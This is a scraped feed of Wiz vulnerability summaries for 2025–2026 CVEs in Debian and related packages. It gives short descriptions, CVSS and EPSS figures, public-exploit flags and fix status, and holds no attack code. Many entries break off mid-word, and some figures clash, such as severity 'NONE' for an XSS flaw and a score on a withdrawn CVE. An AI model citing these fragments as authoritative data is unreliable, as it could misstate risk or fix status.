A flaw was found in dnf5. A local, unprivileged attacker can exploit a path traversal vulnerability in the D-Bus locale configuration. By providing a specially crafted string to the locale key during session opening, the attacker can force the dnf5daemon-server to terminate, leading to an application-level Denial of Service (DoS) with a core dump.
Source : NVD
Published March 9, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ruby-libdnf5-debuginfo
dnf5-debuginfo
Sources
NVD
Wiz
CVE-2025-48517 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
## CVE-2025-48517: Linux Debian vulnerability analysis and mitigation
Insufficient Granularity of Access Control in SEV firmware could allow a privileged user with a malicious hypervisor to create a SEV-ES guest with an ASID in the range meant for SEV-SNP guests potentially resulting in a partial loss of confidentiality.
Source : NVD
Score 4.6
Published February 10, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
amd64-microcode
Sources
NVD
Debian 11 No Fix Added at: Feb 11, 2026
Echo No Fix Added at: Feb 11, 2026
Wiz
CVE-2025-69653 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
## CVE-2025-69653: Linux Debian vulnerability analysis and mitigation
A crafted JavaScript input can trigger an internal assertion failure in QuickJS release 2025-09-13, fixed in commit 1dbba8a88eaa40d15a8a9b70bb1a0b8fb5b552e6 (2025-12-11), in file gc_decref_child in quickjs.c, when executed with the qjs interpreter using the -m option. This leads to an abort (SIGABRT) during garbage collection and causes a denial-of-service.
Source : NVD
Score 6.5
Published March 6, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
quickjs
Sources
Wiz
CVE-2026-25916 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
## CVE-2026-25916: Linux Debian vulnerability analysis and mitigation
Roundcube Webmail before 1.5.13 and 1.6 before 1.6.13, when "Block remote images" is used, does not block SVG feImage.
Source : NVD
Score 4.3
Published February 9, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Feb 10, 2026
Echo Severity MEDIUM Has Fix Added at: Feb 10, 2026
Ubuntu 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix Added at: Mar 10, 202
Wiz
CVE-2022-50857 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2022-50857: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rapidio: rio: fix possible name leak in rio_register_mport()
If device_register() returns an error, the name allocated by dev_set_name()
needs to be freed. put_device() should be used to give up the reference in the
error path, so that the name can be freed in kobject_cleanup(), and
list_del() is called to delete the port from rio_mports.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and librarie
Wiz
CVE-2025-6590 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
## CVE-2025-6590: Linux Debian vulnerability analysis and mitigation
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/htmlform/fields/HTMLUserTextField.Php.
This issue affects MediaWiki: from * through 1.39.12, 1.42.76 1.43.1, 1.44.0.
Source : NVD
Score 4.6
Published February 2, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has F
Wiz
CVE-2026-23325 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-23325: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: Fix possible oob access in mt7996_mac_write_txwi_80211()
Check frame length before accessing the mgmt fields in
mt7996_mac_write_txwi_80211 in order to avoid a possible oob access.
Source : NVD
Score 7.1
Published March 25, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-6.8
linux-gcp-6.14
Sources
NVD
Debian 13 No Fix Added at: Mar 26, 2026
Debian 14 Has F
Wiz
CVE-2018-25222 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2018-25222: Linux Debian vulnerability analysis and mitigation
SC v7.16 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying oversized input that exceeds buffer boundaries. Attackers can craft malicious input strings exceeding 1052 bytes to overwrite the instruction pointer and execute shellcode in the application context.
Source : NVD
Score 8.6
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sc
Sources
NVD
Debian 11, 12, 13, 14 Severity L
Wiz
CVE-2025-40334 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-40334: Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: validate userq buffer virtual address and size
The userq object virtual address needs to be validated to
determine whether it is resident in a valid VM mapping.
Source : NVD
Score 5.1
Published December 9, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-xilinx
linux-gcp-5.4
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Dec 09, 2025
Debian 14 Has Fix Added at: Dec
Wiz
CVE-2026-23554 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
## CVE-2026-23554: Linux Debian vulnerability analysis and mitigation
The Intel EPT paging code uses an optimization to defer flushing of any cached
EPT state until the p2m lock is dropped, so that multiple modifications done
under the same locked region only issue a single flush.
Freeing of paging structures however is not deferred until the flushing is
done, and can result in freed pages transiently being present in cached state.
Such stale entries can point to memory ranges not owned by the guest, thus
allowing access to unintended memory regions.
Source : NVD
Score 7.8
Published March 23, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2025-61656 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-61656: Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation VisualEditor. This vulnerability is associated with program files src/ce/ve.Ce.ClipboardHandler.Js.
This issue affects VisualEditor: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Oct 05, 2025
Echo Has Fix
Wiz
CVE-2026-28295 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
## CVE-2026-28295: Linux Debian vulnerability analysis and mitigation
A flaw was found in the FTP GVfs backend. A malicious FTP server can exploit this vulnerability by providing an arbitrary IP address and port in its passive mode (PASV) response. The client unconditionally trusts this information and attempts to connect to the specified endpoint, allowing the malicious server to probe for open ports accessible from the client's network.
Source : NVD
Score 4.3
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.6
Exploitation Probability (EPSS) N/A
Affected packages and libra
Wiz
CVE-2021-47853 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2021-47853: Echo vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Score 8.6
Published January 21, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
phppgadmin
Sources
NVD
Echo Severity HIGH No Fix Added at: Jan 23, 2026
Wiz
CVE-2026-1764 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-1764: Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
localsearch-debuginfo
localsearch-debugsource
Sources
NVD
Debian 11 No Fix Added at: Feb 04, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 18.04, 20.04 Severity MEDIUM No
Wiz
CVE-2025-6596 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2025-6596: Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Vector. This vulnerability is associated with program files resources/skins.Vector.Js/portlets.Js, resources/skins.Vector.Legacy.Js/portlets.Js.
This issue affects Vector: from >= 1.40.0 before 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13 Has Fix Added at:
## CVE-2026-2903 [MEDIUM, CVSS 4.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
A flaw has been found in skvadrik re2c up to 4.4. Impacted is the function check_and_merge_special_rules of the file src/parse/ast.cc. This manipulation causes null pointer dereference. The attack can only be executed locally. The exploit has been published and may be used. Patch name: febeb977936f9519a25d9fbd10ff8256358cdb97. It is suggested to install a patch to address this issue.
Source : NVD
Score 4.8
Published February 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected pack
## CVE-2026-23378 [HIGH, CVSS 7.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_ife: Fix metalist update behavior
Whenever an ife action replace changes the metalist, instead of
replacing the old data on the metalist, the current ife code is appending
the new metadata. Aside from being inappropriate behavior, this may lead
to an unbounded addition of metadata to the metalist which might cause an
out of bounds error when running the encode op:
[ 138.423369][ C1] ==================================================================
[ 138.424317][ C1] BUG: KASAN: slab-out-of-bounds in ife_tlv_meta_encode (net/ife/ife.c:168)
[ 138.424906][ C1] Write of size 4 at addr ffff8880077f4ffe by task ife_out_out_bou/255
[ 138.4
## CVE-2025-64098 [LOW, CVSS 1.7]: Linux Debian vulnerability analysis and mitigation (Wiz)
PID_IDENTITY_TOKEN
PID_PERMISSIONS_TOKEN
vecsize
readOctetVector
std::vector ::resize
Source : NVD
Score 1.7
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Nov 19, 2025
Echo Severity MEDIUM No Fix Added at: Nov 19, 2025
## CVE-2026-23337 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: pinconf-generic: Fix memory leak in pinconf_generic_parse_dt_config()
In pinconf_generic_parse_dt_config(), if parse_dt_cfg() fails, it returns
directly. This bypasses the cleanup logic and results in a memory leak of
the cfg buffer.
Fix this by jumping to the out label on failure, ensuring kfree(cfg) is
called before returning.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
## CVE-2026-3308 [HIGH, CVSS 7.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
An integer overflow vulnerability in 'pdf-image.c' in Artifex's MuPDF version 1.27.0 allows an attacker to maliciously craft a PDF that can trigger an integer overflow within the 'pdf_load_image_imp' function. This allows a heap out-of-bounds write that could be exploited for arbitrary code execution.
Source : NVD
Score 7.8
Published March 31, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mupdf
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH No Fix Added at: Apr
## CVE-2026-27472 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
SPIP before 4.4.9 allows Blind Server-Side Request Forgery (SSRF) via syndicated sites in the private area. When editing a syndicated site, the application does not verify that the syndication URL is a valid remote URL, allowing an authenticated attacker to make the server issue requests to arbitrary internal or external destinations. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
Score 5.3
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.6
Exploitation Probability (EPSS) 0.1
Affec
## CVE-2026-23429 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
iommu/sva: Fix crash in iommu_sva_unbind_device()
domain->mm->iommu_mm can be freed by iommu_domain_free():
iommu_domain_free()
mmdrop()
__mmdrop()
mm_pasid_drop()
After iommu_domain_free() returns, accessing domain->mm->iommu_mm may
dereference a freed mm structure, leading to a crash.
Fix this by moving the code that accesses domain->mm->iommu_mm to before
the call to iommu_domain_free().
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation
## CVE-2026-21876 [CRITICAL, CVSS 9.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
MULTIPART_PART_HEADERS
TX:0
TX:1
Source : NVD
Score 5.3
Published January 8, 2026
Severity MEDIUM
CNA Score 9.3
Affected Technologies
Linux Debian
Amazon Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
modsecurity-crs
mod_security_crs
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Jan 11, 2026
Echo Severity MEDIUM Has Fix Added at: Jan 11, 2026
## CVE-2025-68262: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
crypto: zstd - fix double-free in per-CPU stream cleanup
The crypto/zstd module has a double-free bug that occurs when multiple
tfms are allocated and freed.
The issue happens because zstd_streams (per-CPU contexts) are freed in
zstd_exit() during every tfm destruction, rather than being managed at
the module level. When multiple tfms exist, each tfm exit attempts to
free the same shared per-CPU streams, resulting in a double-free.
This leads to a stack trace similar to:
BUG: Bad page state in process kworker/u16:1 pfn:106fd93
page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x106fd93
flags: 0x17ffffc0000000(node=0|zone=2|lastcp
## CVE-2026-23012 [HIGH, CVSS 7.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
mm/damon/core: remove call_control in inactive contexts
If damon_call() is executed against a DAMON context that is not running,
the function returns error while keeping the damon_call_control object
linked to the context's call_controls list. Let's suppose the object is
deallocated after the damon_call(), and yet another damon_call() is
executed against the same context. The function tries to add the new
damon_call_control object to the call_controls list, which still has the
pointer to the previous damon_call_control object, which is deallocated.
As a result, use-after-free happens.
This can actually be triggered using the DAMON sysfs interface.
## CVE-2022-50741 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
media: imx-jpeg: Disable useless interrupt to avoid kernel panic
There is a hardware bug that the interrupt STMBUF_HALF may be triggered
after or when disabling the interrupt.
It may lead to an unexpected kernel panic.
And interrupts STMBUF_HALF and STMBUF_RTND have no other effect.
So disable them and the unused interrupts.
Meanwhile, clear the interrupt status when disabling the interrupt.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probabilit
## CVE-2025-14935 [HIGH, CVSS 7.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
NSF Unidata NetCDF-C Dimension Name Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of dimension names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27168.
Source : NVD
Score 7.8
Published Decembe
## CVE-2026-24028 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
An attacker might be able to trigger an out-of-bounds read by sending a crafted DNS response packet, when custom Lua code uses newDNSPacketOverlay to parse DNS packets. The out-of-bounds read might trigger a crash, leading to a denial of service, or access unrelated memory, leading to potential information disclosure.
Source : NVD
Score 5.3
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM N
## CVE-2025-68738 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix null pointer deref in mt7996_conf_tx()
If a link does not have an assigned channel yet, mt7996_vif_link returns
NULL. We still need to store the updated queue settings in that case, and
apply them later.
Move the location of the queue params to within struct mt7996_vif_link.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-6.17
linux-azure-nvi
## CVE-2025-71187 [MEDIUM, CVSS 5.5]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: sh: rz-dmac: fix device leak on probe failure
Make sure to drop the reference taken when looking up the ICU device
during probe also on probe failures (e.g. probe deferral).
Source : NVD
Score 5.5
Published January 31, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-fips
linux-fips
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Jan 31, 2026
Ubuntu 16.0
## CVE-2026-20777 [HIGH, CVSS 8.1]: Linux Debian vulnerability analysis and mitigation (Wiz)
A heap-based buffer overflow vulnerability exists in the Nicolet WFT parsing functionality of The Biosig Project libbiosig 3.9.2 and Master Branch (db9a9a63). A specially crafted .wft file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
Score 8.1
Published March 3, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 03,
## CVE-2025-68196 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Cache streams targeting link when performing LT automation
[WHY]
Last LT automation update can cause crash by referencing current_state and
calling into dc_update_planes_and_stream which may clobber current_state.
[HOW]
Cache relevant stream pointers and iterate through them instead of relying
on the current_state.
Source : NVD
Score 8.8
Published December 16, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/
## CVE-2026-23416 [MEDIUM, CVSS 6.9]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
mm/mseal: update VMA end correctly on merge
Previously we stored the end of the current VMA in curr_end, and then upon
iterating to the next VMA updated curr_start to curr_end to advance to the
next VMA.
However, this doesn't take into account the fact that a VMA might be
updated due to a merge by vma_modify_flags(), which can result in curr_end
being stale and thus, upon setting curr_start to curr_end, ending up with
an incorrect curr_start on the next iteration.
Resolve the issue by setting curr_end to vma->vm_end unconditionally to
ensure this value remains updated should this occur.
While we're here, eliminate this entire class of bug by simp
## CVE-2025-66044 [CRITICAL, CVSS 9.8]: Linux Debian vulnerability analysis and mitigation (Wiz)
Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. When Tag is 64
Source : NVD
Score 9.8
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12, 2
## CVE-2026-34475 [MEDIUM, CVSS 5.4]: Linux Debian vulnerability analysis and mitigation (Wiz)
Varnish Cache before 8.0.1 and Varnish Enterprise before 6.0.16r12, in certain unchecked req.url scenarios, mishandle URLs with a path of / for HTTP/1.1, potentially leading to cache poisoning or authentication bypass.
Source : NVD
Score 5.4
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
varnish:6::varnish-devel
varnish-docs
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 29, 2026
Echo Severity MEDIUM No Fi
## CVE-2025-40356: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
spi: rockchip-sfc: Fix DMA-API usage
Use DMA-API dma_map_single() call for getting the DMA address of the
transfer buffer instead of hacking with virt_to_phys().
This fixes the following DMA-API debug warning:
------------[ cut here ]------------
DMA-API: rockchip-sfc fe300000.spi: device driver tries to sync DMA memory it has not allocated [device address=0x000000000cf70000] [size=288 bytes]
WARNING: kernel/dma/debug.c:1106 at check_sync+0x1d8/0x690, CPU#2: systemd-udevd/151
Modules linked in: ...
Hardware name: Hardkernel ODROID-M1 (DT)
pstate: 604000c9 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : check_sync+0x1d8/0x690
lr : check_sync+0x1
## CVE-2025-68755 [MEDIUM, CVSS 5.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
staging: most: remove broken i2c driver
The MOST I2C driver has been completely broken for five years without
anyone noticing so remove the driver from staging.
Specifically, commit 723de0f9171e ("staging: most: remove device from
interface structure") started requiring drivers to set the interface
device pointer before registration, but the I2C driver was never updated
which results in a NULL pointer dereference if anyone ever tries to
probe it.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
## CVE-2022-50765: Linux Debian vulnerability analysis and mitigation (Wiz)
In the Linux kernel, the following vulnerability has been resolved:
RISC-V: kexec: Fix memory leak of elf header buffer
This is reported by kmemleak detector:
unreferenced object 0xff2000000403d000 (size 4096):
comm "kexec", pid 146, jiffies 4294900633 (age 64.792s)
hex dump (first 32 bytes):
7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 .ELF............
04 00 f3 00 01 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace:
[] kmemleak_vmalloc+0x3c/0xbe
[] __vmalloc_node_range+0x3ac/0x560
[] __vmalloc_node+0x56/0x62
[] vzalloc+0x2c/0x34
[] crash_prepare_elf64_headers+0x80/0x30c
[] elf_kexec_load+0x3e8/0x4ec
[] kexec_image_load_default+0x40/0x4c
[] sys_kexec_file_load+0x1c4/0x322
[] ret_from_syscall+0x0/0x2
## CVE-2026-0397 [LOW, CVSS 3.1]: Linux Debian vulnerability analysis and mitigation (Wiz)
When the internal webserver is enabled (default is disabled), an attacker might be able to trick an administrator logged to the dashboard into visiting a malicious website and extract information about the running configuration from the dashboard. The root cause of the issue is a misconfiguration of the Cross-Origin Resource Sharing (CORS) policy.
Source : NVD
Score 3.1
Published March 31, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11
## CVE-2026-32725 [HIGH, CVSS 8.3]: Linux Debian vulnerability analysis and mitigation (Wiz)
